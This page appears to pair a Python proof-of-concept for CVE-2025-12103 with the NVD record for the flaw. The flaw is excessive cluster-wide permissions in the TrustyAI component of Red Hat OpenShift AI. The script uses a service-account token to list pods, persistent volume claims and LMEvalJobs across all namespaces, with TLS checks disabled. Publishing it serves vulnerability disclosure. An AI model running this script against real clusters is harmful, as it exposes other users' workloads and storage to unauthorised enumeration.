CVE-2025-12103

# CVE-2025-12103 PoC - TrustyAI Excessive Permissions Exploitation # This PoC demonstrates the excessive permissions granted by TrustyAI component import requests import json # Configuration KUBERNETES_API = "https://<api-server>:6443" TOKEN = "<your-service-account-token>" HEADERS = { "Authorization": f"Bearer {TOKEN}", "Content-Type": "application/json" } def list_all_pods(): """List pods across all namespaces - excessive permission""" url = f"{KUBERNETES_API}/api/v1/pods" response = requests.get(url, headers=HEADERS, verify=False) if response.status_code == 200: pods = response.json() print(f"[+] Found {len(pods['items'])} pods across all namespaces") for pod in pods['items'][:5]: print(f" Namespace: {pod['metadata']['namespace']}, Pod: {pod['metadata']['name']}") return response.status_code == 200 def list_all_pvcs(): """List PersistentVolumeClaims across all namespaces""" url = f"{KUBERNETES_API}/api/v1/persistentvolumeclaims" response = requests.get(url, headers=HEADERS, verify=False) if response.status_code == 200: pvcs = response.json() print(f"[+] Found {len(pvcs['items'])} PVCs across all namespaces") return response.status_code == 200 def list_lmeval_jobs(): """List LMEvalJobs custom resources""" url = f"{KUBERNETES_API}/apis/trustyai.opendatahub.io/v1alpha1/lmevaljobs" response = requests.get(url, headers=HEADERS, verify=False) if response.status_code == 200: jobs = response.json() print(f"[+] Found {len(jobs['items'])} LMEvalJobs") return response.status_code == 200 if __name__ == "__main__": print("CVE-2025-12103 - TrustyAI Excessive Permissions PoC") print("=" * 50) list_all_pods() list_all_pvcs() list_lmeval_jobs()

{"cve": {"id": "CVE-2025-12103", "sourceIdentifier": "[email protected]", "published": "2025-10-28T14:15:55.847", "lastModified": "2026-04-23T18:16:22.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Openshift AI Service. The TrustyAI component is granting all service accounts and users on a cluster permissions to get, list, watch any pod in any namespace on the cluster.\n\nTrustyAI is creating a role `trustyai-service-operator-lmeval-user-role` and a CRB `trustyai-service-operator-default-lmeval-user-rolebinding` which is being applied to `system:authenticated` making it so that every single user or service account can get a list of pods running in any namespace on the cluster \n\nAdditionally users can access all `persistentvolumeclaims` and `lmevaljobs`"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21117", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10184", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-12103", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405966", "source": "[email protected]"}]}}